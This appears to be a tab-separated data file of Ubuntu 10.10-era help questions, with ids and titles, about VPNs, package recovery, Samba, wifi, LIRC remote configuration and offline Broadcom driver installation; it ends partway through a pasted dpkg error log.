8303	vpn issues on web browsing	i 'm using maverick and this is the setup : our router connects us to the company 's vpn through which we can access some internal websites . i have to connect also to a customer 's vpn in order to use remote desktop and their websites daily . this customer has a web interface to connect to its vpn , it launches a java app which signs us in and lets us use the services on their network . when i do this , i loose access to my company 's vpn services ( websites ) in all browsers . this does n't happen in the rest of the ( windows ) boxes , and i 'm the only one using gnu/linux on the office . right now , i log out of the customer 's vpn to access the company 's services , but i 'm sure there 's some solution so that i can use both vpns together .
8309	restore default packages	yesterday i installed kde through gnome in ubuntu 10.10 and after some time i decided to uninstall kde manually through the synaptic package manager . i completely removed all the packages which i thought were related to kde and not critical for gnome , but i was wrong as it turns out not only did i delete kde i also deleted a lot of critical packages for gnome . i think i deleted at least half of the critical packages and now i do not have even a terminal and a browser . also when i rebooted i could not even log in to ubuntu so this my question : is there a way to repair ubuntu ?
8316	ubuntu wo n't recognize my hard drive	i am trying to install ubuntu 10.10 and remove my existing windows installation . ubuntu loads fine from the optical drive but then ca n't find a hard drive to install itself to . both my optical / hard drive are sata . i read somewhere that if my bios settings have my sata controller running in ide mode that i should switch them to ahci . i tried this and now the optical disk is n't recognized either ( it just fails to boot from cd and jumps to windows after a spell ) . i do so badly want to replace windows , but i 'm not off to a good start . any suggestions ?
8319	install old version of mysql in 10.10	i 'm using ubuntu 10.10 , but i find that this project is having issues with the version of mysql server that 10.10 installs . i have another machine running the same build of this project but it 's running 10.04 and it does n't have any problems . i found that the version are a little different ( 10.04 has 5.1.41 and 10.10 has 5.1.49 ) . i would like to be able to install the lucid version on my maverick machine , but google is n't turning up anything useful to accomplish this task . anyone know how i would go about doing that ? thanks .
8320	no write-access to samba share	i have two notebooks ( notebook 1 with ubuntu 10.04 and notebook 2 with ubuntu 10.10 ) in a home network and i want to share a folder on notebook 1 with samba . notebook 2 should be able to read/write/delete content of the folder . i installed the packages samba and system-config-samba and i added a user and the share with read/write access to samba with the samba configuration gui . when i enter smb : //notebook_1/folder in nautilus on notebook 2 i can enter username and password . but then i can only read the content of the folder . changing files is not allowed . can somebody help me ? edit : here is the part of my smb.conf , where the share is defined : [ images ] path = /home/user1/images writeable = yes ; browseable = yes valid users = avahi , user1 do i need to add a semicolon in front of writeable ... ?
8322	use network-manager to connect to a wifi access point on the command-line	i 'd like to connect to a wireless access point from the command-line . ideally , i 'd only need the name of the ap . but the hardware-address would work as well . i know i can use nmcli to connect to a managed network connection , but in my case , the access point may not be configured for network-manager yet ( see the difference between the output of nm-tool and nmcli con ) . example output of nmcli : auto pwln 3a3d62b1-bbdf-4f76-b4d2-c211fd5cfb03 802-11-wireless [ ... ] wired network aa586921-accf-4932-98c4-c873c310f08e 802-3-ethernet [ ... ] cisco-udp uni 7f94847b-04dc-40b7-9955-5246fb77cc65 vpn [ ... ] t-mobile ( d1 ) 867f345a-cbbf-4bd4-b883-a5e5ae0932f0 gsm [ ... ] example output of nm-tool : state : connected - device : eth1 [ auto pwln ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ ... ] wireless access points ( * = current ap ) *pwln : infra , [ ... ] , freq 2472 mhz , rate 54 mb/s , strength 80 wpa wpa2 wlan : infra , [ ... ] , freq 2422 mhz , rate 54 mb/s , strength 20 wpa wpa2 [ ... ] how do i connect to an access point that may or may not be known to nm ? extra : finding out if the connection needs a pass-phrase , and submitting it on the command-line as well would be great too ( that is to say it 'd be nice if network-manager would n't pop open any keyring dialogues or errors on the gui )
8324	how can one reinstall sound drivers ?	my machine shut down unexpectedly today ( laptop battery is crap ) and when i rebooted it i lost all sound . i tried to go to preferences- > sound but it just opens a little window saying `` waiting for sound system to respond '' and nothing happens . when my computer rebooted it did warn me of some errors in the filesystem after the unexpected shut down , but i let it correct all errors it found . i understand i may need to reinstall some packages , but i do n't know which . system : dell xps m1330 ubuntu 10.10 64bit is there anyone out there who can help me ? thanks in advance !
8325	problem getting gobi 2000 hs to work	i 've been trying to get my integrated gobi wwan card to work under 10.10 for a while now . i was able to get the network manager to see the card after installing the gobi-loader package . i was able to setup the connection , but i can not establish a connection to verizon . below is the output from /var/log/daemon.log as i try to connect . oct 19 14:29:42 gbeech-x201 aptdaemon : info : quiting due to inactivity oct 19 14:29:42 gbeech-x201 aptdaemon : info : shutdown was requested oct 19 14:33:45 gbeech-x201 networkmanager [ 1105 ] : < info > activation ( ttyusb0 ) starting connection 'verizon connection' oct 19 14:33:45 gbeech-x201 networkmanager [ 1105 ] : < info > ( ttyusb0 ) : device state change : 3 - > 4 ( reason 0 ) oct 19 14:33:45 gbeech-x201 networkmanager [ 1105 ] : < info > activation ( ttyusb0 ) stage 1 of 5 ( device prepare ) scheduled ... oct 19 14:33:45 gbeech-x201 networkmanager [ 1105 ] : < info > activation ( ttyusb0 ) stage 1 of 5 ( device prepare ) started ... oct 19 14:33:45 gbeech-x201 networkmanager [ 1105 ] : < info > ( ttyusb0 ) : device state change : 4 - > 6 ( reason 0 ) oct 19 14:33:45 gbeech-x201 networkmanager [ 1105 ] : < info > activation ( ttyusb0 ) stage 1 of 5 ( device prepare ) complete . oct 19 14:33:45 gbeech-x201 networkmanager [ 1105 ] : < info > activation ( ttyusb0 ) stage 1 of 5 ( device prepare ) scheduled ... oct 19 14:33:45 gbeech-x201 networkmanager [ 1105 ] : < info > activation ( ttyusb0 ) stage 1 of 5 ( device prepare ) started ... oct 19 14:33:45 gbeech-x201 networkmanager [ 1105 ] : < info > ( ttyusb0 ) : device state change : 6 - > 4 ( reason 0 ) oct 19 14:33:45 gbeech-x201 networkmanager [ 1105 ] : < info > activation ( ttyusb0 ) stage 1 of 5 ( device prepare ) complete . oct 19 14:34:46 gbeech-x201 networkmanager [ 1105 ] : < warn > cdma connection failed : ( 32 ) no service oct 19 14:34:46 gbeech-x201 networkmanager [ 1105 ] : < info > ( ttyusb0 ) : device state change : 4 - > 9 ( reason 0 ) oct 19 14:34:46 gbeech-x201 networkmanager [ 1105 ] : < info > marking connection 'verizon connection ' invalid . oct 19 14:34:46 gbeech-x201 networkmanager [ 1105 ] : < warn > activation ( ttyusb0 ) failed . oct 19 14:34:46 gbeech-x201 networkmanager [ 1105 ] : < info > ( ttyusb0 ) : device state change : 9 - > 3 ( reason 0 ) oct 19 14:34:46 gbeech-x201 networkmanager [ 1105 ] : < info > ( ttyusb0 ) : deactivating device ( reason : 0 ) . oct 19 14:34:46 gbeech-x201 networkmanager [ 1105 ] : < info > policy set 'auto so-guest ' ( wlan0 ) as default for ipv4 routing and dns . oct 19 14:34:46 gbeech-x201 networkmanager [ 1105 ] : < info > policy set 'auto so-guest ' ( wlan0 ) as default for ipv4 routing and dns .
8329	is there a system journal that i can install ?	i am talking about a program that will show you all the changes you made to the system , in case i have to trouble shoot my system ? a cli one will be better , in case of worst case scenario
8332	how can i keep an old linux version but upgrade to a new distribution ?	back story i tried out the latest netbook remix on my dell inspiron 600m and it was badly broken . so , i 've been trying to downgrade to a usable system . i 've managed to restore a 10.04 netbook remix and restore my home dir but i still have the issue of linux not coming back from suspend . linux 2.6.28-11-generic now , i 've downloaded the 9.04 installer and narrowed down the issue to the linux version being used . the stock linux 2.6.28-11-generic works perfectly . suspend is fully operational and it even goes to sleep when you close the lid and wakes up when you open it . i can keep this version of linux by pinning the meta package and upgrading with apt-get . unfortunately , the graphic tools do n't work as well ( for me ymmv ) and the update manager looks like it will upgrade linux despite being asked not to . pin linux-generic at current version to tell apt-get to leave the linux kernel untouched when it upgrades the system , we will pin the package linux-generic to the current version . on a fresh 9.04 netbook install , the linux-generic package is at version 2.6.28.11.15 spinlock @ sendack : ~ $ apt-cache policy linux-generic linux-generic : installed : 2.6.28.11.15 candidate : 2.6.28.19.24 version table : 2.6.28.19.24 0 500 http : //us.archive.ubuntu.com jaunty-updates/restricted packages 500 http : //security.ubuntu.com jaunty-security/restricted packages *** 2.6.28.11.15 0 500 http : //us.archive.ubuntu.com jaunty/restricted packages 100 /var/lib/dpkg/status to pin this version we need to edit /etc/apt/policies ( as root ) and add the following lines : package : linux-generic pin : version 2.6.28.11* priority : 1001 upgrade with apt-get now , you can upgrade the system with apt-get : $ sudo apt-get update $ sudo apt-get upgrade you may have some non-linux packages that are held back when you upgrade but you can use the install flag to upgrade those individually : $ sudo apt-get install firefox question so , here 's my question , after all of that , i 'm still running the 9.04 version of ubuntu . is there anyway to upgrade the version while keeping my kernel version where it is ? thanks .
8334	trying to use gnome-shell but it will not work	it acts like it wants to work , but all i get is the bar across the top with `` activities '' , the time , my name , and the background . after that my computer will do nothing else . i installed it following the directions here , detailing how to install it on ubuntu ( have tried the repository version and the ppa version ) . graphics card information : $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 )
8336	how can one make firefox ignore my gtk theme entirely ?	i have a dark gtk theme installed in my ubuntu 10.10 install and a persona installed for firefox that i also like . the problem is that firefox is using my dark gtk theme for items like buttons and text fields on common web pages , and this commonly creates unreadable menus , textareas , and buttons . ( white text on white backgrounds , or black text on black buttons ) . i do n't want to change either theme , because they look great in every other application , and i do n't want to have to do something crazy to my firefox install like use custom user scripts or css overrides.. all i want to do is tell firefox to stop using my gtk theme completely.. this appears to be what google 's chrome browser does and it makes the most sense by far ... how can web developers possibly work around all the possible gtk themes out there ?
8339	out of range error with dual displays	i 'm trying to setup dual monitors on a new 10.10 installation . i have an lg w2040 and a westinghouse l2610nw . the lg works , but the westinghouse displays an `` out of range '' notice and nothing else . if i try to change the resolution in the nvidia x server settings window and hit apply the westinghouse monitor stays unchanged , but the lg picture gets skewed and i have to reboot . i can change the westinghouse resolution and hit save to x config file and logout and log back in and the setting shows as changed without skewing the lg , but the westinghouse is still dark . they both work fine in windows . my video card is an nvidia 8500gt . things are currently set to `` separate x screen '' , though i have n't had much luck playing with twin view either .
8342	change my remote controls keys	i have problems changing my remotes keys . the rc has a joystick for controlling the mouse cursor . after connecting the rc to my computer everything works fine , but the shortcuts are made for windows mce and thus they do n't fit for me . i tried to solve my problem with lirc . this works so far as fine , but i ca n't use my joystick with this configuration . now i do n't have an idea how to activate this joystick again , because it worked without lirc ( rather than without irexec ) . does anybody have a hint for me how to activate the joystick or change the shortcuts in another way ? my rc is in /dev/input/event3 and /dev/input/mouse1 and respectively /dev/input/by-path/pci-0000:00:04.0-usb-0:3:1.0-event-mouse and /dev/input/by-path/pci-0000:00:04.0-usb-0:3:1.0-mouse . here are my configs : /etc/lirc/hardware.conf # /etc/lirc/hardware.conf # # chosen remote control remote= '' linux input layer ( /dev/input/eventx ) '' remote_modules= '' '' remote_driver= '' devinput '' remote_device= '' /dev/input/by-path/pci-0000:00:04.0-usb-0:3:1.0-event-mouse '' remote_socket= '' '' remote_lircd_conf= '' devinput/lircd.conf.devinput '' remote_lircd_args= '' '' # chosen ir transmitter transmitter= '' none '' transmitter_modules= '' '' transmitter_driver= '' '' transmitter_device= '' '' transmitter_socket= '' '' transmitter_lircd_conf= '' '' transmitter_lircd_args= '' '' # enable lircd start_lircd= '' true '' # do n't start lircmd even if there seems to be a good config file start_lircmd= '' true '' # try to load appropriate kernel modules load_modules= '' true '' # default configuration files for your hardware if any lircmd_conf= '' '' # forcing noninteractive reconfiguration # if lirc is to be reconfigured by an external application # that does n't have a debconf frontend available , the noninteractive # frontend can be invoked and set to parse remote and transmitter # it will then populate all other variables without any user input # if you would like to configure lirc via standard methods , be sure # to leave this set to `` false '' force_noninteractive_reconfiguration= '' false '' start_lircmd= '' '' /etc/lirc/hardware.conf # this configuration has been automatically generated via # the ubuntu lirc package maintainer scripts . # # it includes the default configuration for the remote and/or # transmitter that you have selected during package installation . # # feel free to add any custom remotes to the configuration # via additional include directives or below the existing # ubuntu include directives from your selected remote and/or # transmitter . # configuration for the linux input layer ( /dev/input/eventx ) remote : include `` /usr/share/lirc/remotes/devinput/lircd.conf.devinput '' /usr/share/lirc/remotes/devinput/lircd.conf.devinput # generated by devinput.sh begin remote name devinput bits 16 eps 30 aeps 100 one 0 0 zero 0 0 pre_data_bits 16 pre_data 0x8001 gap 132799 toggle_bit_mask 0x0 begin codes key_0 0x000b key_102nd 0x0056 key_1 0x0002 key_2 0x0003 key_3 0x0004 key_4 0x0005 key_5 0x0006 key_6 0x0007 key_7 0x0008 key_8 0x0009 key_9 0x000a key_a 0x001e key_ab 0x0196 key_again 0x0081 key_alterase 0x00de key_angle 0x0173 key_apostrophe 0x0028 key_archive 0x0169 key_audio 0x0188 key_aux 0x0186 key_b 0x0030 key_back 0x009e key_backslash 0x002b key_backspace 0x000e key_bassboost 0x00d1 key_battery 0x00ec key_blue 0x0191 key_bookmarks 0x009c key_break 0x019b key_brightnessdown 0x00e0 key_brightnessup 0x00e1 key_brl_dot1 0x01f1 key_brl_dot2 0x01f2 key_brl_dot3 0x01f3 key_brl_dot4 0x01f4 key_brl_dot5 0x01f5 key_brl_dot6 0x01f6 key_brl_dot7 0x01f7 key_brl_dot8 0x01f8 key_c 0x002e key_calc 0x008c key_calendar 0x018d key_camera 0x00d4 key_cancel 0x00df key_capslock 0x003a key_cd 0x017f key_channel 0x016b key_channeldown 0x0193 key_channelup 0x0192 key_chat 0x00d8 key_clear 0x0163 key_close 0x00ce key_closecd 0x00a0 key_coffee 0x0098 key_comma 0x0033 key_compose 0x007f key_computer 0x009d key_config 0x00ab key_connect 0x00da key_copy 0x0085 key_cut 0x0089 key_cyclewindows 0x009a key_d 0x0020 key_del_eol 0x01c0 key_del_eos 0x01c1 key_delete 0x006f key_deletefile 0x0092 key_del_line 0x01c3 key_digits 0x019d key_direction 0x0099 key_directory 0x018a key_documents 0x00eb key_dot 0x0034 key_down 0x006c key_dvd 0x0185 key_e 0x0012 key_edit 0x00b0 key_ejectcd 0x00a1 key_ejectclosecd 0x00a2 key_email 0x00d7 key_end 0x006b key_enter 0x001c key_epg 0x016d key_equal 0x000d key_esc 0x0001 key_exit 0x00ae key_f10 0x0044 key_f11 0x0057 key_f12 0x0058 key_f13 0x00b7 key_f14 0x00b8 key_f15 0x00b9 key_f1 0x003b key_f16 0x00ba key_f17 0x00bb key_f18 0x00bc key_f19 0x00bd key_f20 0x00be key_f21 0x00bf key_f22 0x00c0 key_f23 0x00c1 key_f24 0x00c2 key_f2 0x003c key_f 0x0021 key_f3 0x003d key_f4 0x003e key_f5 0x003f key_f6 0x0040 key_f7 0x0041 key_f8 0x0042 key_f9 0x0043 key_fastforward 0x00d0 key_favorites 0x016c key_file 0x0090 key_finance 0x00db key_find 0x0088 key_first 0x0194 key_fn 0x01d0 key_fn_1 0x01de key_fn_2 0x01df key_fn_b 0x01e4 key_fn_d 0x01e0 key_fn_e 0x01e1 key_fn_esc 0x01d1 key_fn_f 0x01e2 key_fn_f10 0x01db key_fn_f1 0x01d2 key_fn_f11 0x01dc key_fn_f12 0x01dd key_fn_f2 0x01d3 key_fn_f3 0x01d4 key_fn_f4 0x01d5 key_fn_f5 0x01d6 key_fn_f6 0x01d7 key_fn_f7 0x01d8 key_fn_f8 0x01d9 key_fn_f9 0x01da key_fn_s 0x01e3 key_forward 0x009f key_forwardmail 0x00e9 key_front 0x0084 key_g 0x0022 key_goto 0x0162 key_grave 0x0029 key_green 0x018f key_h 0x0023 key_hangeul 0x007a key_hanja 0x007b key_help 0x008a key_henkan 0x005c key_hiragana 0x005b key_home 0x0066 key_homepage 0x00ac key_hp 0x00d3 key_i 0x0017 key_info 0x0166 key_insert 0x006e key_ins_line 0x01c2 key_iso 0x00aa key_j 0x0024 key_k 0x0025 key_katakana 0x005a key_katakanahiragana 0x005d key_kbdillumdown 0x00e5 key_kbdillumtoggle 0x00e4 key_kbdillumup 0x00e6 key_keyboard 0x0176 key_kp0 0x0052 key_kp1 0x004f key_kp2 0x0050 key_kp3 0x0051 key_kp4 0x004b key_kp5 0x004c key_kp6 0x004d key_kp7 0x0047 key_kp8 0x0048 key_kp9 0x0049 key_kpasterisk 0x0037 key_kpcomma 0x0079 key_kpdot 0x0053 key_kpenter 0x0060 key_kpequal 0x0075 key_kpjpcomma 0x005f key_kpleftparen 0x00b3 key_kpminus 0x004a key_kpplus 0x004e key_kpplusminus 0x0076 key_kprightparen 0x00b4 key_kpslash 0x0062 key_l 0x0026 key_language 0x0170 key_last 0x0195 key_left 0x0069 key_leftalt 0x0038 key_leftbrace 0x001a key_leftctrl 0x001d key_leftmeta 0x007d key_leftshift 0x002a key_linefeed 0x0065 key_list 0x018b key_m 0x0032 key_macro 0x0070 key_mail 0x009b key_max 0x01ff key_media 0x00e2 key_memo 0x018c key_menu 0x008b key_mhp 0x016f key_minus 0x000c key_mode 0x0175 key_move 0x00af key_mp3 0x0187 key_msdos 0x0097 key_muhenkan 0x005e key_mute 0x0071 key_n 0x0031 key_new 0x00b5 key_next 0x0197 key_nextsong 0x00a3 key_numlock 0x0045 key_o 0x0018 key_ok 0x0160 key_open 0x0086 key_option 0x0165 key_p 0x0019 key_pagedown 0x006d key_pageup 0x0068 key_paste 0x0087 key_pause 0x0077 key_pausecd 0x00c9 key_pc 0x0178 key_phone 0x00a9 key_play 0x00cf key_playcd 0x00c8 key_player 0x0183 key_playpause 0x00a4 key_power 0x0074 key_power2 0x0164 key_previous 0x019c key_previoussong 0x00a5 key_print 0x00d2 key_prog1 0x0094 key_prog2 0x0095 key_prog3 0x00ca key_prog4 0x00cb key_program 0x016a key_props 0x0082 key_pvr 0x016e key_q 0x0010 key_question 0x00d6 key_r 0x0013 key_radio 0x0181 key_record 0x00a7 key_red 0x018e key_redo 0x00b6 key_refresh 0x00ad key_reply 0x00e8 key_reserved 0x0000 key_restart 0x0198 key_rewind 0x00a8 key_right 0x006a key_rightalt 0x0064 key_rightbrace 0x001b key_rightctrl 0x0061 key_rightmeta 0x007e key_rightshift 0x0036 key_ro 0x0059 key_s 0x001f key_sat 0x017d key_sat2 0x017e key_save 0x00ea key_screen 0x0177 key_scrolldown 0x00b2 key_scrolllock 0x0046 key_scrollup 0x00b1 key_search 0x00d9 key_select 0x0161 key_semicolon 0x0027 key_send 0x00e7 key_sendfile 0x0091 key_setup 0x008d key_shop 0x00dd key_shuffle 0x019a key_slash 0x0035 key_sleep 0x008e key_slow 0x0199 key_sound 0x00d5 key_space 0x0039 key_sport 0x00dc key_stop 0x0080 key_stopcd 0x00a6 key_subtitle 0x0172 key_suspend 0x00cd key_switchvideomode 0x00e3 key_sysrq 0x0063 key_t 0x0014 key_tab 0x000f key_tape 0x0180 key_teen 0x019e key_text 0x0184 key_time 0x0167 key_title 0x0171 key_tuner 0x0182 key_tv 0x0179 key_tv2 0x017a key_twen 0x019f key_u 0x0016 key_undo 0x0083 key_unknown 0x00f0 key_up 0x0067 key_v 0x002f key_vcr 0x017b key_vcr2 0x017c key_vendor 0x0168 key_video 0x0189 key_volumedown 0x0072 key_volumeup 0x0073 key_w 0x0011 key_wakeup 0x008f key_www 0x0096 key_x 0x002d key_xfer 0x0093 key_y 0x0015 key_yellow 0x0190 key_yen 0x007c key_z 0x002c key_zenkakuhankaku 0x0055 key_zoom 0x0174 btn_0 0x0100 btn_1 0x0101 btn_2 0x0102 btn_3 0x0103 btn_4 0x0104 btn_5 0x0105 btn_6 0x0106 btn_7 0x0107 btn_8 0x0108 btn_9 0x0109 btn_a 0x0130 btn_b 0x0131 btn_back 0x0116 btn_base 0x0126 btn_base2 0x0127 btn_base3 0x0128 btn_base4 0x0129 btn_base5 0x012a btn_base6 0x012b btn_c 0x0132 btn_dead 0x012f btn_digi 0x0140 btn_extra 0x0114 btn_forward 0x0115 btn_gamepad 0x0130 btn_gear_down 0x0150 btn_gear_up 0x0151 btn_joystick 0x0120 btn_left 0x0110 btn_middle 0x0112 btn_misc 0x0100 btn_mode 0x013c btn_mouse 0x0110 btn_pinkie 0x0125 btn_right 0x0111 btn_select 0x013a btn_side 0x0113 btn_start 0x013b btn_stylus 0x014b btn_stylus2 0x014c btn_task 0x0117 btn_thumb 0x0121 btn_thumb2 0x0122 btn_thumbl 0x013d btn_thumbr 0x013e btn_tl 0x0136 btn_tl2 0x0138 btn_tool_airbrush 0x0144 btn_tool_brush 0x0142 btn_tool_doubletap 0x014d btn_tool_finger 0x0145 btn_tool_lens 0x0147 btn_tool_mouse 0x0146 btn_tool_pen 0x0140 btn_tool_pencil 0x0143 btn_tool_rubber 0x0141 btn_tool_tripletap 0x014e btn_top 0x0123 btn_top2 0x0124 btn_touch 0x014a btn_tr 0x0137 btn_tr2 0x0139 btn_trigger 0x0120 btn_wheel 0x0150 btn_x 0x0133 btn_y 0x0134 btn_z 0x0135 end codes end remote ~/.lircrc begin prog = irexec button = key_leftalt button = key_f4 config = xte `` keydown alt_l '' `` keydown f4 '' `` keyup f4 '' `` keyup alt_l '' end # # # # # # # # # # # # # # steuerung # # # # # # # # # # # # # # begin prog = irexec button = key_left config = xte `` key left '' end begin prog = irexec button = key_up config = xte `` key up '' end begin prog = irexec button = key_down config = xte `` key down '' end begin prog = irexec button = key_right config = xte `` key right '' end begin prog = irexec button = key_enter config = xte `` key return '' end begin prog = irexec button = key_backspace config = xte `` key escape '' end begin prog = irexec button = key_leftctrl button = key_leftshift button = key_m config = xte `` key tab '' end # # # # # # # # # # # # # # # # # # # # video-steuerung # # # # # # # # # # # # # # # # # # # # begin prog = irexec button = key_leftctrl button = key_leftshift button = key_p config = xte `` key xf86audioplay '' end begin prog = irexec button = key_leftctrl button = key_p config = xte `` key xf86audiopause '' end begin prog = irexec button = key_stopcd config = xte `` key xf86audiostop '' end begin prog = irexec button = key_leftctrl button = key_b config = xte `` key xf86audioprev '' end begin prog = irexec button = key_leftctrl button = key_f config = xte `` key xf86audionext '' end begin prog = irexec button = key_leftctrl button = key_leftshift button = key_b config = xte `` key xf86back '' end begin prog = irexec button = key_leftctrl button = key_leftshift button = key_f config = xte `` key xf86forward '' end # # # # # # # # # # # # # # # lautst채rke # # # # # # # # # # # # # # # begin prog = irexec button = key_f9 config = xte `` key xf86audiolowervolume '' end begin prog = irexec button = key_f10 config = xte `` key xf86audioraisevolume '' end begin prog = irexec button = key_f8 config = xte `` key xf86audiomute '' end # # # # # # # # # # # # # # # # # # # buttons farbig # # # # # # # # # # # # # # # # # # # begin prog = irexec button = key_leftctrl button = key_leftshift button = key_t config = xte `` keydown control_l '' `` keydown alt_l '' `` key d '' `` keyup alt_l '' `` keyup control_l '' end begin prog = irexec button = key_leftctrl button = key_e # config = /home/zwaen/rc/btn-green end begin prog = irexec button = key_leftctrl button = key_i # config = /home/zwaen/rc/btn-yellow end begin prog = irexec button = key_leftctrl button = key_m # config = /home/zwaen/rc/btn-blue end # # # # # # # # # # # # # # buttons s # # # # # # # # # # # # # # begin prog = irexec button = key_homepage # config = /home/zwaen/rc/s1 end begin prog = irexec button = key_bookmarks # config = /home/zwaen/rc/s2 end begin prog = irexec button = key_back # config = /home/zwaen/rc/s3 end begin prog = irexec button = key_forward # config = /home/zwaen/rc/s4 end
8344	package dependency problem ( offline install of wireless drivers )	i have a friend wanting to install ubuntu 10.10 as a dual-boot with windows through wubi . unfortunately , he has a wireless card with a broadcom chipset , and needs to install the drivers . there is no other way for him to connect to the internet ; he can not connect via ethernet or another wi-fi dongle/card . i generated a synaptic download script for what i think are the appropriate packages , and he downloaded the .debs to \wifi\packages from windows . he then ran these commands : kieran @ ubuntu : ~ $ cd /host/wifi kieran @ ubuntu : /host/wifi $ sudo dpkg -i packages/*.deb [ sudo ] password for kieran : ( reading database ... 120178 files and directories currently installed . ) preparing to replace bcmwl-kernel-source 5.60.48.36+bdcom-0ubuntu3 ( using ... /bcmwl-kernel-source_5.60.48.36+bdcom-0ubuntu3_i386.deb ) ... removing all dkms modules done . unpacking replacement bcmwl-kernel-source ... preparing to replace broadcom-sta-common 5.10.91.9.3-3 ( using ... /broadcom-sta-common_5.10.91.9.3-3_all.deb ) ... unpacking replacement broadcom-sta-common ... preparing to replace broadcom-sta-source 5.10.91.9.3-3 ( using ... /broadcom-sta-source_5.10.91.9.3-3_all.deb ) ... unpacking replacement broadcom-sta-source ... preparing to replace build-essential 11.4build1 ( using ... /build-essential_11.4build1_i386.deb ) ... unpacking replacement build-essential ... preparing to replace cvs 1:1.12.13-12ubuntu1 ( using ... /cvs_1.12.13-12ubuntu1_i386.deb ) ... unpacking replacement cvs ... preparing to replace debhelper 7.4.15ubuntu1 ( using ... /debhelper_7.4.15ubuntu1_all.deb ) ... unpacking replacement debhelper ... preparing to replace diffstat 1.47-1build1 ( using ... /diffstat_1.47-1build1_i386.deb ) ... unpacking replacement diffstat ... preparing to replace dkms 2.1.1.2-2fakesync1 ( using ... /dkms_2.1.1.2-2fakesync1_all.deb ) ... unpacking replacement dkms ... preparing to replace dpkg-dev 1.15.5.6ubuntu4.3 ( using ... /dpkg-dev_1.15.5.6ubuntu4.3_all.deb ) ... unpacking replacement dpkg-dev ... preparing to replace fakeroot 1.14.4-1ubuntu1 ( using ... /fakeroot_1.14.4-1ubuntu1_i386.deb ) ... unpacking replacement fakeroot ... preparing to replace g++ 4:4.4.3-1ubuntu1 ( using ... /g++_4.4.3-1ubuntu1_i386.deb ) ... unpacking replacement g++ ... preparing to replace g++-4.4 4.4.3-4ubuntu5 ( using ... /g++-4.4_4.4.3-4ubuntu5_i386.deb ) ... unpacking replacement g++-4.4 ... preparing to replace gettext 0.17-8ubuntu3 ( using ... /gettext_0.17-8ubuntu3_i386.deb ) ... unpacking replacement gettext ... preparing to replace html2text 1.3.2a-14build1 ( using ... /html2text_1.3.2a-14build1_i386.deb ) ... unpacking replacement html2text ... preparing to replace intltool-debian 0.35.0+20060710.1 ( using ... /intltool-debian_0.35.0+20060710.1_all.deb ) ... unpacking replacement intltool-debian ... preparing to replace libmail-sendmail-perl 0.79.16-1 ( using ... /libmail-sendmail-perl_0.79.16-1_all.deb ) ... unpacking replacement libmail-sendmail-perl ... preparing to replace libstdc++6-4.4-dev 4.4.3-4ubuntu5 ( using ... /libstdc++6-4.4-dev_4.4.3-4ubuntu5_i386.deb ) ... unpacking replacement libstdc++6-4.4-dev ... preparing to replace libsys-hostname-long-perl 1.4-2 ( using ... /libsys-hostname-long-perl_1.4-2_all.deb ) ... unpacking replacement libsys-hostname-long-perl ... preparing to replace patch 2.6-2ubuntu1 ( using ... /patch_2.6-2ubuntu1_i386.deb ) ... unpacking replacement patch ... preparing to replace po-debconf 1.0.16 ( using ... /po-debconf_1.0.16_all.deb ) ... unpacking replacement po-debconf ... preparing to replace quilt 0.48-5 ( using packages/quilt_0.48-5_all.deb ) ... unpacking replacement quilt ... setting up broadcom-sta-common ( 5.10.91.9.3-3 ) ... setting up cvs ( 1:1.12.13-12ubuntu1 ) ... ignoring install-info called from maintainer script the package cvs should be rebuilt with new debhelper to get trigger support ignoring install-info called from maintainer script the package cvs should be rebuilt with new debhelper to get trigger support setting up diffstat ( 1.47-1build1 ) ... setting up dkms ( 2.1.1.2-2fakesync1 ) ... dpkg : dependency problems prevent configuration of dpkg-dev : dpkg-dev depends on xz-utils ; however : package xz-utils is not configured yet . dpkg : error processing dpkg-dev ( -- install ) : dependency problems - leaving unconfigured setting up fakeroot ( 1.14.4-1ubuntu1 ) ... dpkg : dependency problems prevent configuration of g++-4.4 : g++-4.4 depends on gcc-4.4-base ( = 4.4.3-4ubuntu5 ) ; however : version of gcc-4.4-base on system is 4.4.4-14ubuntu5 . g++-4.4 depends on gcc-4.4 ( = 4.4.3-4ubuntu5 ) ; however : version of gcc-4.4 on system is 4.4.4-14ubuntu5 . g++-4.4 depends on libmpfr1ldbl ; however : package libmpfr1ldbl is not installed . dpkg : error processing g++-4.4 ( -- install ) : dependency problems - leaving unconfigured setting up gettext ( 0.17-8ubuntu3 ) ... setting up html2text ( 1.3.2a-14build1 ) ... dpkg : dependency problems prevent configuration of libstdc++6-4.4-dev : libstdc++6-4.4-dev depends on gcc-4.4-base ( = 4.4.3-4ubuntu5 ) ; however : version of gcc-4.4-base on system is 4.4.4-14ubuntu5 . libstdc++6-4.4-dev depends on g++-4.4 ( = 4.4.3-4ubuntu5 ) ; however : package g++-4.4 is not configured yet . dpkg : error processing libstdc++6-4.4-dev ( -- install ) : dependency problems - leaving unconfigured setting up libsys-hostname-long-perl ( 1.4-2 ) ... setting up patch ( 2.6-2ubuntu1 ) ... dpkg : dependency problems prevent configuration of build-essential : build-essential depends on dpkg-dev ( > = 1.13.5 ) ; however : package dpkg-dev is not configured yet . dpkg : error processing build-essential ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of debhelper : debhelper depends on dpkg-dev ( > = 1.14.19 ) ; however : package dpkg-dev is not configured yet . dpkg : error processing debhelper ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of g++ : g++ depends on g++-4.4 ( > = 4.4.3-1 ) ; however : package g++-4.4 is not configured yet . dpkg : error processing g++ ( -- install ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of broadcom-sta-source : broadcom-sta-source depends on debhelper ( > = 7 ) ; however : package debhelper is not configured yet . dpkg : error processing broadcom-sta-source ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... setting up bcmwl-kernel-source ( 5.60.48.36+bdcom-0ubuntu3 ) ... loading new bcmwl-5.60.48.36+bdcom dkms files ... first installation : checking all kernels ... building only for 2.6.35-22-generic building for architecture i686 building initial module for 2.6.35-22-generic error ! bad return status for module build on kernel : 2.6.35-22-generic ( i686 ) consult the make.log in the build directory /var/lib/dkms/bcmwl/5.60.48.36+bdcom/build/ for more information . traceback ( most recent call last ) : file `` /usr/share/apport/package-hooks/dkms.py '' , line 57 , in report.write ( open ( apport.fileutils.make_report_path ( report ) , 'w ' ) ) ioerror : [ errno 2 ] no such file or directory : '/var/crash/bcmwl-kernel-source.0.crash' dpkg : error 